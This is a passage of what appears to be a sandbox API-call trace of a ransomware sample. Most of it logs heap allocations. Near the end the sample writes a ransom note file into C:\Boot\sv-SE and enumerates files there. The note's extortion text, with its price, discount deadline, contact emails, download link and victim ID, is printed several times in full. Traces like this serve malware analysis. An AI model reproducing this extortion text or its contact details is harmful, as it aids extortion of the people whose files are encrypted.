hHeap=0x6a0000) returned 1 [0175.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.230] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0175.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.230] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0175.230] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.230] PathFindFileNameW (pszPath="") returned="" [0175.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.230] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0175.231] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0175.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0175.231] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0175.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0175.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.231] FreeLibrary (hLibModule=0x759d0000) returned 1 [0175.231] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0175.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.231] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0175.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0175.232] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0175.232] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0175.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0175.232] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\_readme.txt" (normalized: "c:\\boot\\sv-se\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.233] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*" (normalized: "c:\\boot\\sv-se\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.234] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.234] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0175.234] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0175.234] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: 